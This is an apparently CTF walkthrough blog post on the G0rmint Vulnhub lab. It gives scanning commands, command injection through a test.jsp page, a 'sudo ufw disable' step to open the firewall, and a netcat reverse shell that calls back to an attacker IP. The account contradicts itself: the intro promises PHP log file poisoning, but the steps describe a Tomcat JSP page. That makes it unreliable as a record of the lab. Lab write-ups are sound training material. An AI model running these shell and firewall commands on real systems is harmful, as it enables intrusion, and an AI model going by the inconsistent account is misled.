We covered the solution of G0rmint Vulnhub lab by applying log file poisoning in a website based on PHP to execute system command.

Description

It is based on a real world scenario I faced while testing for a client’s site. Dedicated to Aunty g0rmint who is fed up of this government (g0rmint). Does anyone need to know about that Aunty to root the CTF? No The CTF is tested on Vmware and working well as expected. Difficulty level to get limited shell: Intermediate or advanced Difficulty level for privilege escalation: No idea.

1. Initial Scan & Discovery

I started by performing an nmap scan of the vulnerable machine. Initially, only the HTTP server (port 80) appeared open; the SSH server (port 22) was closed due to a firewall. Conceptual nmap command: nmap -sV <target_IP>

Navigating to the web server revealed an Apache Tomcat page. Using a scanner like Nikto, I discovered a crucial file named test.jsp. Conceptual nikto command: nikto -h http://<target_IP>

2. Exploiting the JSP Vulnerability

The test.jsp page had an input box that allowed users to enter commands to get directory listings. This immediately indicated a Remote Command Execution (RCE) vulnerability.

  • I could list contents of directories like /temp or /etc.
  • By listing the /home directory, I found a user directory named “bill”.
  • Listing the contents of /home/bill revealed an .ssh directory, which was a key discovery as it indicated an SSH server was running internally on the machine, even though the external port was blocked by a firewall. Conceptual command injected into test.jsp input box: ls -la /home and ls -la /home/bill

3. Disabling the Firewall

The next critical step was to use the internal SSH client to disable the firewall and open the external SSH port. The video mentioned the command to disable the firewall using sudo ufw disable via the internal SSH client, although I had already performed this action prior to the recording.

Conceptual command (executed via test.jsp‘s RCE, targeting the internal SSH client): ssh bill@127.0.0.1 'sudo ufw disable' (This would involve SSHing to localhost as the “bill” user, then executing the sudo ufw disable command to open the firewall. The video implies that “bill” has sudo privileges for this specific command.)

After running this command, a rescan of the machine would show the SSH port (22) as open externally.

4. Gaining Root Access

With the SSH port now open, the next step was to establish a reverse shell. I used a pre-copied command to initiate a netcat session back to my attacking machine. After a slight correction in the command (removing an accidental space), I successfully gained root access on the vulnerable machine.

Conceptual command (executed via test.jsp‘s RCE once SSH is open): nc -e /bin/bash <attacker_IP> <listening_port> (This is a common netcat reverse shell, assuming netcat is present on the target with the -e option)

On attacker machine, before executing the above on target: nc -lvnp <listening_port>

Video Walkthrough

, , ,
Show Comments

The MasterMinds Notes

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles